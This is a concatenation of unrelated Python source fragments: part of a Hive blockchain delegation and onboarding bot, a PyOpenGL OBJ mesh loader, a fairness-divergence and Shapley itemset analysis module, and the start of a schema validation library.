continue
if account == self.config["muteAccount"] and json_data["following"] in self.accounts:
self.check_muted([json_data["following"]])
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "delegate_vesting_shares":
if op["delegator"] != self.config["delegationAccount"]:
continue
account = op["delegatee"]
if account not in list(self.accounts.keys()):
continue
delegated_hp = self.hive.vests_to_hp(float(Amount(op["vesting_shares"], blockchain_instance=self.hive)))
self.accounts[account]["delegated_hp"] = delegated_hp
self.accounts[account]["delegation_timestamp"] = timestamp
if delegated_hp > 0 and self.accounts[account]["delegation_revoked"]:
self.accounts[account]["delegation_revoked"] = False
elif delegated_hp == 0 and not self.accounts[account]["delegation_revoked"]:
self.accounts[account]["delegation_revoked"] = True
store_data(self.data_file, "accounts", self.accounts)
elif op["type"] == "create_claimed_account":
if op["json_metadata"] == "":
continue
meta_data = json.loads(op["json_metadata"])
if "beneficiaries" not in meta_data:
continue
for entry in meta_data["beneficiaries"]:
if entry["label"] == "referrer" and entry["name"] == self.config["referrerAccount"]:
self.accounts[op["new_account_name"]] = {"timestamp": None, "weight": None, "muted": False, "rc": 0, "hp": 0,
"delegated_hp": 0, "delegation_timestamp": None, "rc_comments": 0,
"delegation_revoked": False}
self.accounts[op["new_account_name"]]["weight"] = entry["weight"]
self.accounts[op["new_account_name"]]["timestamp"] = op["timestamp"].replace(tzinfo=None)
store_data(self.data_file, "accounts", self.accounts)
return last_block_num
def main():
parser = argparse.ArgumentParser()
parser.add_argument("config", help="Config file in JSON format")
parser.add_argument("--logconfig", help="Logger Config file in JSON format", default='logger.json')
parser.add_argument("--datadir", help="Data storage dir", default='.')
parser.add_argument('--list-accounts', action='store_true')
args = parser.parse_args()
setup_logging(default_path=args.logconfig)
logger.info("Loading config: %s" % str(args.config))
config = json.loads(open(os.path.abspath(args.config)).read())
datadir = args.datadir
nodelist = NodeList()
nodelist.update_nodes()
hive = Hive(node=nodelist.get_hive_nodes(), num_retries=5, call_num_retries=3, timeout=15)
blockchain = Blockchain(blockchain_instance=hive)
logger.info(str(hive))
data_file = os.path.join(datadir, 'data.db')
bot = DelegationOnboardBot(
config,
data_file,
hive
)
| |
#<NAME>
#---------------
from PIL import Image
from OpenGL.GL import *
from OpenGL.GLU import *
from numpy import *
import random
import os, re
#from OpenGL.GL.ARB.vertex_buffer_object import *
from OpenGL.arrays import ArrayDatatype as ADT
try:
import psutil
psutil_enable = True
except:
psutil_enable = False
mem_Limit = 80.0
import ctypes
folders = "Folders"
obj_files = "OBJ"
def cross(A, B, C):
v1 = (A[0] - B[0], A[1] - B[1], A[2] - B[2])
v2 = (C[0] - B[0], C[1] - B[1], C[2] - B[2])
n = (v1[1] * v2[2] - v1[2] * v2[1],
v1[2] * v2[0] - v1[0] * v2[2],
v1[0] * v2[1] - v1[1] * v2[0])
d = sqrt(n[0]**2 + n[1]**2 + n[2]**2)
if d != 0:
n = (n[0] / d, n[1] / d, n[2] / d)
return n
class polygon:
def __init__(self):
self.vertex = []
self.uvtext = []
self.normal = []
self.verts = self.getverts
self.norms = self.getnormals
self.texts = self.getuvcoords
def create_normal(self):
polypoints = self.verts()
planenormal = cross(polypoints[0], polypoints[1], polypoints[2])
for n in self.normal:
n.__init__(planenormal)
def getverts(self):
return [(x.coords) for x in self.vertex]
def getnormals(self):
return [(x.coords) for x in self.normal]
def getuvcoords(self):
return [(x.coords) for x in self.uvtext]
class vertex:
def __init__(self, coords, index = -1):
self.coords = coords
self.x = coords[0]
self.y = coords[1]
self.z = coords[2]
self.index = index
def __getitem__(self, i):
return self.coords[i]
class texture:
def __init__(self, coords):
self.coords = coords
self.x = coords[0]
self.y = coords[1]
def __getitem__(self, i):
return self.coords[i]
class normal:
def __init__(self, coords):
self.coords = coords
self.x = coords[0]
self.y = coords[1]
self.z = coords[2]
def __getitem__(self, i):
return self.coords[i]
def qualify(faces):
F = []
for f in faces:
verts = f.verts()
for v in verts:
if (v[0] >= -1 and v[0] <= 1 and
v[1] >= -1 and v[1] <= 1 and
v[2] >= -1 and v[2] <= 1):
F.append(f)
break
return F
def load(filename):
verts = []
norms = []
uvtex = []
faces = []
vcount = 0
if psutil_enable:
v = psutil.virtual_memory().percent
else:
v = 0.0
if v > mem_Limit:
filename = os.path.join(folders, obj_files, "Cube.obj")
for line in open(filename, "r"):
vals = line.split()
if len(vals) < 1:
continue
if vals[0] == "v":
verts.append(vertex(list(map(float, vals[1:4])), vcount))
vcount += 1
if vals[0] == "vt":
uvtex.append(texture(list(map(float, vals[1:3]))))
if vals[0] == "vn":
norms.append(normal(list(map(float, vals[1:4]))))
if vals[0] == "f":
faces.append(polygon())
for f in vals[1:]:
w = f.split("/")
if verts:
faces[-1].vertex.append(verts[int(w[0])-1])
if uvtex:
try:
faces[-1].uvtext.append(uvtex[int(w[1])-1])
except:
faces[-1].uvtext.append(texture([0, 0]))
else:
faces[-1].uvtext.append(texture([0, 0]))
if norms:
try:
faces[-1].normal.append(norms[int(w[2])-1])
except:
faces[-1].normal.append(normal([0, 1, 0]))
else:
faces[-1].normal.append(normal([0, 1, 0]))
if not norms:
for f in faces:
f.create_normal()
return faces
def load_verts(filename):
verts = []
faces = []
norms = []
vcount = 0
if psutil_enable:
v = psutil.virtual_memory().percent
else:
v = 0.0
if v > mem_Limit:
filename = os.path.join(folders, obj_files, "Cube.obj")
for line in open(filename, "r"):
vals = line.split()
if len(vals) < 1:
continue
if vals[0] == "v":
verts.append(vertex(list(map(float, vals[1:4])), vcount))
vcount += 1
if vals[0] == "vn":
norms.append(normal(list(map(float, vals[1:4]))))
if vals[0] == "f":
faces.append(polygon())
for f in vals[1:]:
w = f.split("/")
if verts:
faces[-1].vertex.append(verts[int(w[0])-1])
if norms:
try:
faces[-1].normal.append(norms[int(w[2])-1])
except:
faces[-1].normal.append(normal([0, 1, 0]))
else:
faces[-1].normal.append(normal([0, 1, 0]))
if not norms:
norms = [object] * len(verts)
for f in faces:
f.create_normal()
for v, n in zip(f.vertex, f.normal):
norms[v.index] = n
return faces, verts, norms
def load_Faces(filename, progress = None, advance = False):
print("load_Faces")
(path, name) = os.path.split(filename)
extension = name[-3:]
R = re.match(r'(\D*)(\d*)', name)
Faces = []
Verts = []
Norms = []
if os.path.isdir(path):
dirs = []
try:
dirs = os.listdir(path)
dirs.sort()
except(Exception) as detail:
print('EXC0')
return Faces, Verts, Norms
for i in dirs:
if i[-3:] == extension:
if R.group(2):
if R.group(1) == i[:len(R.group(1))]:
if psutil_enable:
v = psutil.virtual_memory().percent
else:
v = 0.0
if v > mem_Limit:
return Faces, Verts, Norms
if progress:
try:
if advance:
progress.advance("repros\n")
progress.set_msg1(str(i))
except(Exception) as detail:
print(detail)
return Faces, Verts, Norms
faces, verts, norms = load_verts(os.path.join(path, i))
Faces.append(faces)
Verts.append(verts)
Norms.append(norms)
return Faces, Verts, Norms
else:
return Faces, Verts, Norms
class obj_transform():
def __init__(self, faces, Faces = [], Verts = [], Norms = []):
self.faces = faces
self.Faces = [faces,]
self.validate_Faces(len(faces), Faces)
self.Tfaces = [object] * len(self.faces)
for x, f in enumerate(self.faces):
self.Tfaces[x] = polygon()
self.Tfaces[x].vertex = [object] * len(f.verts())
self.modelview = False
self.angle = 0
self.vector = (0, 1, 0)
self.sx = 1.0
self.sy = 1.0
self.sz = 1.0
self.px = 0
self.py = 0
self.objdisplayList = 0
self.vertex_arrays = False
self.VBO = False
self.Frames = len(self.Faces)
self.frame = 0
self.vert_array3 = [list()] * self.Frames
self.vert_array4 = [list()] * self.Frames
self.vert_array_Fan = [list()] * self.Frames
self.verts3 = [list()] * self.Frames
self.verts4 = [list()] * self.Frames
self.verts_Fan = [list()] * self.Frames
self.norm_array3 = [list()] * self.Frames
self.norm_array4 = [list()] * self.Frames
self.norm_array_Fan = [list()] * self.Frames
self.norms3 = [list()] * self.Frames
self.norms4 = [list()] * self.Frames
self.norms_Fan = [list()] * self.Frames
self.vert_array_Lines = [list()] * self.Frames
self.norm_array_Lines = [list()] * self.Frames
self.text_array_Lines = list()
self.lines = [list()] * self.Frames
self.line_norms = [list()] * self.Frames
self.Edges, self.Lines = self.build_Edges(faces)
self.Verts = Verts
self.Norms = Norms
try:
print("Faces", len(self.Faces[0]))
print("Verts", len(self.Verts[0]))
print("Norms", len(self.Norms[0]))
except:
pass
self.wireDraw = False
self.objectDraw = True
def cleanup(self):
for f in self.Faces:
for i in f:
del i
for i in self.faces:
del i
if self.VBO:
glDeleteBuffers(12, self.buffers)
def build_Edges(self, Faces):
edges = {}
Edges = []
Lines = []
for i in Faces:
index = []
verts = {}
norms = {}
texts = {}
for v, n, t in zip(i.vertex, i.normal, i.uvtext):
index.append(v.index)
verts[v.index] = v
norms[v.index] = n
texts[v.index] = t
INDEX = index[1:] + [index[0]]
for x, y in zip(index, INDEX):
edge = (x, y)
if (y, x) in edges:
pass
else:
edges[edge] = 1
Edge = (verts[x], verts[y], norms[x], norms[y], texts[x], texts[y])
Edges.append(Edge)
Lines.append(edge)
print("Edges number", len(Edges))
return Edges, Lines
def validate_Faces(self, length, Faces):
print("validate_Faces", length)
for i in Faces:
print(len(i))
if len(i) == length:
self.Faces.append(i)
def set_up_VBO(self, usage = GL_STATIC_DRAW):
self.VBO = True
print("set_up_VBO", self.Frames)
for x in range(self.Frames):
try:
self.verts3[x] = array(self.vert_array3[x], dtype = float32)
self.verts4[x] = array(self.vert_array4[x], dtype = float32)
self.verts_Fan[x] = array(self.vert_array_Fan[x], dtype = float32)
self.norms3[x] = array(self.norm_array3[x], dtype = float32)
self.norms4[x] = array(self.norm_array4[x], dtype = float32)
self.norms_Fan[x] = array(self.norm_array_Fan[x], dtype = float32)
self.lines[x] = array(self.vert_array_Lines[x], dtype = float32)
self.line_norms[x] = array(self.norm_array_Lines[x], dtype = float32)
except:
self.Frames = x
self.buffers = glGenBuffers(12)
self.buffer_line_array2 = self.buffers[0]
self.buffer_norm_array2 = self.buffers[1]
self.buffer_text_array2 = self.buffers[2]
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_line_array2)
self.buffer_line_array2_size = ADT.arrayByteCount(self.lines[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_line_array2_size, self.lines[0], usage)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array2)
self.buffer_line_norms_size = ADT.arrayByteCount(self.line_norms[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_line_norms_size, self.line_norms[0], usage)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array2)
self.line_texts = array(self.text_array_Lines, dtype = float32)
glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.line_texts), self.line_texts, usage)
self.buffer_vert_array3 = self.buffers[3]
self.buffer_norm_array3 = self.buffers[4]
self.buffer_text_array3 = self.buffers[5]
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array3)
self.buffer_vert_array3_size = ADT.arrayByteCount(self.verts3[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array3_size, self.verts3[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array3)
self.buffer_norm_array3_size = ADT.arrayByteCount(self.norms3[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array3_size, self.norms3[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array3)
self.texts3 = array(self.text_array3, dtype = float32)
glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts3), self.texts3, usage)
self.buffer_vert_array4 = self.buffers[6]
self.buffer_norm_array4 = self.buffers[7]
self.buffer_text_array4 = self.buffers[8]
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array4)
self.buffer_vert_array4_size = ADT.arrayByteCount(self.verts4[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array4_size, self.verts4[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array4)
self.buffer_norm_array4_size = ADT.arrayByteCount(self.norms4[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array4_size, self.norms4[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array4)
self.texts4 = array(self.text_array4, dtype = float32)
glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts4), self.texts4, usage)
self.buffer_vert_array_Fan = self.buffers[9]
self.buffer_norm_array_Fan = self.buffers[10]
self.buffer_text_array_Fan = self.buffers[11]
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array_Fan)
self.buffer_vert_array_Fan_size = ADT.arrayByteCount(self.verts_Fan[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array_Fan_size, self.verts_Fan[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array_Fan)
self.buffer_norm_array_Fan_size = ADT.arrayByteCount(self.norms_Fan[0])
glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array_Fan_size, self.norms_Fan[0], GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array_Fan)
self.texts_Fan = array(self.text_array_Fan, dtype = float32)
glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts_Fan), self.texts_Fan, usage)
def set_up_vertex_array(self):
print("set_up_vertex_array")
if not self.vertex_arrays:
self.vertex_arrays = True
vert_array3 = []
vert_array4 = []
vert_array_Fan = []
vert_array_Lines = []
norm_array_Lines = []
norm_array3 = []
norm_array4 = []
norm_array_Fan = []
self.text_array3 = []
self.text_array4 = []
self.text_array_Fan = []
self.arraySize3 = 0
self.arraySize4 = 0
self.arraySize_Fan = []
self.arraySize_Lines = 0
for f in self.faces:
verts = f.verts()
normals = f.norms()
uv = f.texts()
if len(verts) == 3:
for i in range(3):
vert_array3.append(verts[i])
norm_array3.append(normals[i])
self.text_array3.append(uv[i])
self.arraySize3 += 3
elif len(verts) == 4:
for i in range(4):
vert_array4.append(verts[i])
norm_array4.append(normals[i])
self.text_array4.append(uv[i])
self.arraySize4 += 4
elif len(verts) > 4:
n = len(verts)
for i in range(n):
vert_array_Fan.append(verts[i])
norm_array_Fan.append(normals[i])
self.text_array_Fan.append(uv[i])
self.arraySize_Fan.append(n)
for | |
<gh_stars>1-10
def getItemsetMetric(freq_metrics, metric="d_fnr"):
d = freq_metrics[["itemsets", metric]].set_index("itemsets").to_dict("index")
return {
k: {k1: v[metric] for k1, v in d.items() if k == len(k1)}
for k in range(0, max(freq_metrics["length"] + 1))
}
def getItemsetMetrics(freq_metrics, metrics=["d_fnr", "support"]):
d = freq_metrics[["itemsets"] + metrics].set_index("itemsets").to_dict("index")
return {
k: {k1: v for k1, v in d.items() if k == len(k1)}
for k in range(0, max(freq_metrics["length"] + 1))
}
def getLenDictionaries(dictionary, sortKey=False):
lenDict = {
len(k): {x: dictionary[x] for x in dictionary if len(x) == len(k)}
for k in dictionary
}
if sortKey:
return {k: v for k, v in sorted(lenDict.items(), key=lambda item: item[0])}
return lenDict
def sortItemset(x, abbreviations={}):
x = list(x)
x.sort()
x = ", ".join(x)
for k, v in abbreviations.items():
x = x.replace(k, v)
return x
def abbreviateDict(d, abbreviations):
# Shapley values (dict) as input
return {
frozenset([sortItemset(k, abbreviations=abbreviations)]): v
for k, v in d.items()
}
# freq_metrics.loc[freq_metrics.length==1][["itemsets", "support"]].set_index("itemsets")["support"].to_dict()
from .shapley_value_FPx import (
shapley_subset,
computeShapleyItemset,
computeDeltaDiffShap,
)
from .lattice_graph import (
getLatticeItemsetMetric,
plotLatticeGraph_colorGroups,
plotLatticeGraph_colorGroups_v1,
)
# from .utils_significance import *
i_col = "item i"
delta_col = "delta_item"
v_si_col = "v_S+i"
v_s_col = "v_S"
corr_coef = "corr_coef"
corr_coef_sq = "corr_coef_sq"
s_col = "S"
corr_coef_mse = "corr_coef_mse"
MSE_col = "MSE"
SSE_col = "SSE"
SE_col = "SE"
map_metric = {"ACsf": "accuracy", "SPsf": "accuracy", "FPsf": "fp", "FNsf": "fn"}
map_beta_distribution = {
"d_fpr": {"T": ["fp"], "F": ["tn"]},
"d_fnr": {"T": ["fn"], "F": ["tp"]},
"d_accuracy": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
"d_fpr_abs": {"T": ["fp"], "F": ["tn"]},
"d_fnr_abs": {"T": ["fn"], "F": ["tp"]},
"d_accuracy_abs": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
"d_posr": {"T": ["tp", "fn"], "F": ["tn", "fp"]},
"d_negr": {"T": ["tn", "fp"], "F": ["tp", "fn"]},
# "d_classiferror": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
# "d_classiferror_abs": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
"d_error": {"T": ["fp", "fn"], "F": ["tp", "tn"]},
"d_ppv": {"T": ["tp"], "F": ["fp"]},
"d_tpr": {"T": ["tp"], "F": ["fn"]},
"d_tnr": {"T": ["tn"], "F": ["fp"]},
"d_npv": {"T": ["tn"], "F": ["fn"]},
"d_fdr": {"T": ["fp"], "F": ["tp"]},
"d_for": {"T": ["fn"], "F": ["tn"]},
}
VIZ_COL_NAME = "viz"
# TODO --> move
def _compute_t_test(df, col_mean, col_var, mean_d, var_d):
return (abs(df[col_mean] - mean_d)) / ((df[col_var] + var_d) ** 0.5)
def _compute_std_beta_distribution(FPb):
return ((FPb.a * FPb.b) / ((FPb.a + FPb.b) ** 2 * (FPb.a + FPb.b + 1))) ** (1 / 2)
def _compute_variance_beta_distribution(FPb):
return (FPb.a * FPb.b) / ((FPb.a + FPb.b) ** 2 * (FPb.a + FPb.b + 1))
def _compute_mean_beta_distribution(FPb):
return FPb.a / (FPb.a + FPb.b)
# Item name in the paper
i_name = "α" # or i
# Pattern or itemset name in the paper
p_name = "I"
# Name for diverge in the paper
div_name = "Δ"
class FP_Divergence:
def __init__(self, freq_metrics, metric):
self.freq_metrics = freq_metrics
self.metric = metric
self.cl_metric = (
self.metric.split("_")[1] if "_" in self.metric else map_metric[self.metric]
)
self.itemset_divergence = getItemsetMetric(freq_metrics, metric)
self.df_delta = None
self.global_shapley = None
self.corr_df = None
self.itemset_divergence_not_redundant = None
self.itemset_divergence_not_redundant_df = None
self.corr_statistics_df = None
self.deltas_statistics_df = None
self.metric_name = (
"_".join(self.metric.split("_")[1:]).upper()
if self.metric.startswith("d_")
else self.metric.replace("_", "\\_")
)
self.t_value_col = (
f"t_value_{'_'.join(map_beta_distribution[self.metric]['T'])}"
if self.metric in map_beta_distribution
else None
)
self.corrSignif = None
def getItemsetDivergence(self, itemsetI):
itemsetI = frozenset(itemsetI) if type(itemsetI) == list else itemsetI
return self.itemset_divergence[len(itemsetI)][itemsetI]
def getKVItemsetsDivergence(self):
return (
self.freq_metrics[["itemsets", self.metric]]
.set_index("itemsets")[self.metric]
.to_dict()
)
def getTvalues(self):
if self.t_value_col not in self.freq_metrics.columns:
self.t_test(ret=False)
return (
self.freq_metrics[["itemsets", self.t_value_col]]
.set_index("itemsets")
.to_dict()[self.t_value_col]
)
def plotLatticeItemset_v1(
self,
itemset,
sizeDot="",
Th_divergence=None,
getLower=False,
getAllGreaterTh=False,
useMarker=True,
show=False,
):
nameTitle = f"Metric: {self.metric}"
info_lattice = getLatticeItemsetMetric(
itemset, self.itemset_divergence, getLower=getLower
)
color_groups = {}
nodes = info_lattice["itemset_metric"]
# Save info node - parent source
# node_sources={}
if Th_divergence is not None:
nameTitle = f"{nameTitle} - Threshold: {Th_divergence}"
color_groups["greater"] = [
k for k, v in nodes.items() if abs(v) >= Th_divergence
]
if getLower:
nameTitle = f"{nameTitle} - show lower"
color_groups["lower"] = info_lattice["lower"]
if getAllGreaterTh and Th_divergence is not None:
color_groups["all_greater"] = []
for node in [
k for k, v in nodes.items() if abs(v) >= Th_divergence
]: # color_groups["greater"]:
if [p for p in color_groups["all_greater"] if p.issubset(node)] == []:
if [
k
for k, v in nodes.items()
if abs(v) < Th_divergence and node.issubset(k)
] == []:
color_groups["all_greater"].append(node)
# Save info node - parent source
# else:
# node_sources[node]=[p for p in color_groups["all_greater"] if p.issubset(node)]
color_groups["normal"] = list(
set(nodes) - set([v for v1 in color_groups.values() for v in v1])
)
color_map = {
"normal": "#6175c1",
"lower": "lightblue",
"greater": "#ff6666",
"all_greater": "#580023",
}
return plotLatticeGraph_colorGroups_v1(
info_lattice["lattice_graph"],
info_lattice["itemset_metric"],
color_groups,
annotation_F=True,
metric=nameTitle,
sizeDot=sizeDot,
color_map=color_map,
useMarker=useMarker,
show=show,
)
# else:
# plotLatticeGraph(info_lattice["lattice_graph"], info_lattice["itemset_metric"], metric=f"Metric: {self.metric}", annotation_F=True, sizeDot=sizeDot)#, Th_divergence=0.1)
# TODO: getLower to showCorrective
def plotLatticeItemset(
self,
itemset,
Th_divergence=None,
getLower=False,
getAllGreaterTh=False,
**kwargs,
):
nameTitle = f"Metric: {self.metric}"
info_lattice = getLatticeItemsetMetric(
itemset, self.itemset_divergence, getLower=getLower
)
color_groups = {}
nodes = info_lattice["itemset_metric"]
# Save info node - parent source
# node_sources={}
if Th_divergence is not None:
nameTitle = f"{nameTitle} - Threshold: {Th_divergence}"
color_groups["greater"] = [
k for k, v in nodes.items() if abs(v) >= Th_divergence
]
if getLower:
nameTitle = f"{nameTitle} - show lower"
color_groups["lower"] = info_lattice["lower"]
if getAllGreaterTh and Th_divergence is not None:
color_groups["all_greater"] = []
for node in [
k for k, v in nodes.items() if abs(v) >= Th_divergence
]: # color_groups["greater"]:
if [p for p in color_groups["all_greater"] if p.issubset(node)] == []:
if [
k
for k, v in nodes.items()
if abs(v) < Th_divergence and node.issubset(k)
] == []:
color_groups["all_greater"].append(node)
# Save info node - parent source
# else:
# node_sources[node]=[p for p in color_groups["all_greater"] if p.issubset(node)]
color_groups["normal"] = list(
set(nodes) - set([v for v1 in color_groups.values() for v in v1])
)
color_map = {
"normal": "#6175c1",
"lower": "lightblue",
"greater": "#ff6666",
"all_greater": "#580023",
}
return plotLatticeGraph_colorGroups(
info_lattice["lattice_graph"],
info_lattice["itemset_metric"],
color_groups,
metric=nameTitle,
color_map=color_map,
**kwargs,
)
def getFItemsetsDivergence(self, redundant=True):
if redundant:
return self.itemset_divergence
else:
if self.itemset_divergence_not_redundant is not None:
return self.itemset_divergence_not_redundant
return self.getFItemsetsDivergenceNotRedundant(lenFormat=True)
def getFItemsetsDivergenceNotRedundant(self, lenFormat=False):
if self.itemset_divergence_not_redundant is not None:
return self.itemset_divergence_not_redundant
itemset_divergence_not_redundant_df = (
self.getFItemsetsDivergenceDfNotRedundant()
)
itemset_divergence_not_redundant = (
itemset_divergence_not_redundant_df.set_index("itemsets").T.to_dict("int")[
self.metric
]
)
self.itemset_divergence_not_redundant = getLenDictionaries(
itemset_divergence_not_redundant
)
return (
self.itemset_divergence_not_redundant
if lenFormat
else itemset_divergence_not_redundant
)
def getFItemsetsDivergenceDfNotRedundant(self):
def removeRedundant(df, a):
import pandas as pd
grouped_itemset = list(df.itemsets.values)
d = pd.DataFrame(
{
"itemsets": [
grouped_itemset[i]
for i in range(0, len(grouped_itemset))
if len(
[
k
for k in grouped_itemset[0:i]
if k.issubset(grouped_itemset[i])
]
)
== 0
]
}
)
d[a] = df.name
return d
if self.itemset_divergence_not_redundant_df is not None:
return self.itemset_divergence_not_redundant_df
dfs = self.freq_metrics.sort_values(
[self.metric, "length"], ascending=[False, True]
)[["itemsets", self.metric]]
dfs_g = dfs.copy()
dfs_g.loc[dfs_g.loc[dfs_g[self.metric].isnull()].index, self.metric] = "NaN"
grouped = dfs_g.groupby(self.metric, group_keys=False).apply(
removeRedundant, self.metric
)
import math
grouped = grouped.replace({self.metric: "NaN"}, float("NaN"))
not_red = grouped.sort_values(self.metric, ascending=False).reset_index(
drop=True
)
self.itemset_divergence_not_redundant_df = not_red
return self.itemset_divergence_not_redundant_df
def getDivergenceMetricNotRedundant(self, th_redundancy=0, sortV=True):
if th_redundancy is None:
return self.freq_metrics
df_corr = self.getDfDeltaShapleyValue()
redundant = df_corr.loc[abs(df_corr.delta_item) <= th_redundancy]
redundant_itemsets = set(redundant["S+i"].values)
# freq_metric_Red=self.freq_metrics.loc[self.freq_metrics.itemsets.isin(redundant_itemsets)]
freq_metric_NotRed = self.freq_metrics.loc[
self.freq_metrics.itemsets.isin(redundant_itemsets) == False
]
if sortV:
return freq_metric_NotRed.sort_values(
[self.metric, self.cl_metric], ascending=False
)
else:
return freq_metric_NotRed
def getRedundantMarginalContribution(self, th_redundancy=0):
df_corr = self.getDfDeltaShapleyValue()
return df_corr.loc[abs(df_corr.delta_item) <= th_redundancy]
def getInfoItemset(self, itemset):
if type(itemset) == list:
itemset = frozenset(itemset)
return self.freq_metrics.loc[self.freq_metrics.itemsets == itemset]
def getInfoItemsets(self, list_itemsets):
if type(list_itemsets[0]) == list:
list_itemsets = [frozenset(itemset) for itemset in list_itemsets]
return self.freq_metrics.loc[
self.freq_metrics.itemsets.apply(lambda x: x in list_itemsets)
]
def getFMetricGreaterTh(
self, T_thr=0.1, lenFormat=False, absValue=True, sortedV=False
):
if absValue:
greaterT = {
k2: v2
for k, v in self.itemset_divergence.items()
for k2, v2 in v.items()
if abs(v2) >= T_thr
}
else:
greaterT = {
k2: v2
for k, v in self.itemset_divergence.items()
for k2, v2 in v.items()
if v2 > T_thr
}
if sortedV:
greaterT = {
k: v
for k, v in sorted(
greaterT.items(), key=lambda item: item[1], reverse=True
)
}
return getLenDictionaries(greaterT) if lenFormat else greaterT
def getDivergenceTopK(self, K=10, lenFormat=False, th_redundancy=None, absF=False):
# item_s_flat={k2: v for k in self.itemset_divergence for k2, v in self.itemset_divergence[k].items()}
# topK={k: v for k, v in sorted(item_s_flat.items(), key=lambda item: item[1], reverse=True)[:K]}
scores = (
self.freq_metrics[["itemsets", self.metric, self.cl_metric]]
if th_redundancy is None
else self.getDivergenceMetricNotRedundant(th_redundancy=th_redundancy)
)
if absF:
topKDF = scores.iloc[scores[self.metric].abs().argsort()[::-1]][
["itemsets", self.metric]
].head(K)
else:
topKDF = scores.sort_values([self.metric, self.cl_metric], ascending=False)[
["itemsets", self.metric]
].head(K)
topK = topKDF.set_index("itemsets").to_dict()[self.metric]
return getLenDictionaries(topK) if lenFormat else topK
def getDivergenceTopKDf(self, K=10, th_redundancy=None, absF=False):
# item_s_flat={k2: v for k in self.itemset_divergence for k2, v in self.itemset_divergence[k].items()}
# topK={k: v for k, v in sorted(item_s_flat.items(), key=lambda item: item[1], reverse=True)[:K]}
# OK:scores=self.freq_metrics if redundant else self.getFItemsetsDivergenceDfNotRedundant()
| |
"""
Schema is a library for validating Python data structures, such as those
obtained from config-files, forms, external services or command-line
parsing, converted from JSON/YAML (or something else) to Python data-types.
NOTE: This is a fixed fork of: https://github.com/keleshev/schema
"""
import re
import os
__all__ = ['Schema',
'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden', 'Const',
'SchemaError',
'SchemaWrongKeyError',
'SchemaMissingKeyError',
'SchemaForbiddenKeyError',
'SchemaUnexpectedTypeError']
class SchemaError(Exception):
"""
Error during Schema validation.
"""
def __init__(self, autos, errors=None):
self.autos = autos if isinstance(autos, list) else [autos]
self.errors = errors if isinstance(errors, list) else [errors]
Exception.__init__(self, self.code)
@staticmethod
def uniq(seq):
"""
Utility function that removes duplicate.
:param seq: sequence to examine
:return: deduplicated sequence
"""
seen = set()
return [element for element in seq if element not in seen and not seen.add(element)]
@property
def code(self):
"""
Removes duplicates values in auto and error list.
parameters.
:return: string for error display
"""
data_set = self.uniq(i for i in self.autos if i is not None)
error_list = self.uniq(i for i in self.errors if i is not None)
return os.linesep.join(error_list if error_list else data_set)
class SchemaWrongKeyError(SchemaError):
"""
Error Should be raised when an unexpected key is detected within the
data set being.
"""
class SchemaMissingKeyError(SchemaError):
"""
Error should be raised when a mandatory key is not found within the
data set being validated.
"""
class SchemaForbiddenKeyError(SchemaError):
"""
Error should be raised when a forbidden key is found within the
data set being validated, and its value matches the value that was specified.
"""
class SchemaUnexpectedTypeError(SchemaError):
"""
Error should be raised when a type mismatch is detected within the
data set being validated.
"""
class And(object):
"""
Utility function to combine validation directives in AND Boolean fashion.
"""
def __init__(self, *args, **kw):
self._args = args
assert set(kw).issubset(['error', 'schema', 'ignore_extra_keys'])
self._error = kw.get('error')
self._ignore_extra_keys = kw.get('ignore_extra_keys', False)
# You can pass your inherited Schema class.
self._schema = kw.get('schema', Schema)
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__,
', '.join(repr(a) for a in self._args))
def validate(self, data):
"""
Validate data using defined sub schema/expressions ensuring all
values are valid.
:param data: to be validated with sub defined schemas.
:return: returns validated data
"""
for expr in [self._schema(expr, error=self._error,
ignore_extra_keys=self._ignore_extra_keys) for expr in self._args]:
data = expr.validate(data)
return data
class Or(And):
"""
Utility function to combine validation directives in a OR Boolean
fashion.
"""
def validate(self, data):
"""
Validate data using sub defined schema/expressions ensuring at least
one value is valid.
:param data: data to be validated by provided schema.
:raises SchemaError: when validation failed.
:return: return validated data if not validation
"""
autos, errors = [], []
for stmt in [self._schema(expr, error=self._error,
ignore_extra_keys=self._ignore_extra_keys) for expr in self._args]:
try:
return stmt.validate(data)
except SchemaError as exc:
autos, errors = exc.autos, exc.errors
raise SchemaError(['Did not validate %r' % data] + autos,
[self._error.format(data) if self._error else None] + errors)
class Regex(object):
"""
Enables schema.py to validate string using regular expressions.
"""
# Map all flags bits to a more readable description
NAMES = ['re.ASCII', 're.DEBUG', 're.VERBOSE', 're.UNICODE', 're.DOTALL',
